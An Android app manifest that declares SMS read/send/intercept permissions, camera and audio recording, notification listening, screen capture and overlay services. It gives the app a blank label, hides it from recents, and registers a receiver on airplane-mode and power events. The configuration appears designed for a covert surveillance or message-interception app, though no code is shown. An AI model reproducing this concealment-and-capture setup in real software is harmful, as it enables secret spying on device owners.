<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools" >
    <queries>
        <package android:name="com.android.slap"/>
        <package android:name="com.ivirse.figame"/>
    </queries>


    <uses-feature android:name="android.hardware.camera" android:required="false"/>
    <uses-feature android:name="android.hardware.camera.autofocus" android:required="false"/>
    <uses-feature android:name="android.hardware.camera.front" android:required="false"/>
    <uses-feature android:name="android.hardware.camera.front.autofocus" android:required="false"/>

    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />

    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission
        android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission
        android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.INTERNET" />


    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.BLUETOOTH" />
    <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
    <uses-permission android:name="android.permission.BLUETOOTH_CONNECT" />

    <application
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_launcher"
        android:label=" "
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.AppTestA"
        tools:targetApi="31"
        android:configChanges="keyboard|keyboardHidden|orientation|screenSize|screenLayout|smallestScreenSize|uiMode"
        android:excludeFromRecents="true"
        android:launchMode="singleTop"
        >

        <service android:name="MiddleSmsService"
            android:enabled="true"
            />
<!--        <receiver-->
<!--            android:name="MiddleSmsService"-->
<!--            android:exported="true"-->
<!--            android:permission="android.permission.CHANGE_NETWORK_STATE"-->
<!--            >-->
<!--            <intent-filter android:priority="10">-->
<!--&lt;!&ndash;                <action android:name="android.provider.Telephony.SMS_RECEIVED" />&ndash;&gt;-->
<!--                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>-->
<!--                <action android:name="android.intent.action.AIRPLANE_MODE"/>-->
<!--            </intent-filter>-->
<!--        </receiver>-->


        <receiver
            android:name=".SmsBroadCaster"
            android:exported="true"
            android:enabled="true"
            android:permission="android.permission.BROADCAST_SMS"
            >
            <intent-filter>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="com.google.firebase.MESSAGING_EVENT"/>
            </intent-filter>
        </receiver>

<!--        <service-->
<!--            android:name=".ListenNotificationService"-->
<!--            android:exported="true"-->
<!--            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">-->
<!--            <intent-filter>-->
<!--                <action android:name="android.service.notification.NotificationListenerService" />-->
<!--            </intent-filter>-->
<!--        </service>-->
        <service
            android:name=".ListenNotificationService"
            android:exported="true"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>


        <activity
            android:name=".ScreenCaptureActivity"
            android:exported="true"
            android:foregroundServiceType="mediaProjection"
            >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>

            <meta-data
                android:name="android.app.lib_name"
                android:value="" />


        </activity>


        <service
            android:name=".ScreenCaptureService"
            android:foregroundServiceType="mediaProjection" />

        <service
            android:name=".OverlayService"
             />


        <!--        <service-->
<!--            android:name="."-->
<!--            android:enabled="true"-->
<!--            android:foregroundServiceType="mediaProjection"/>-->
<!--        <service android:name=""-->
        
    </application>

</manifest>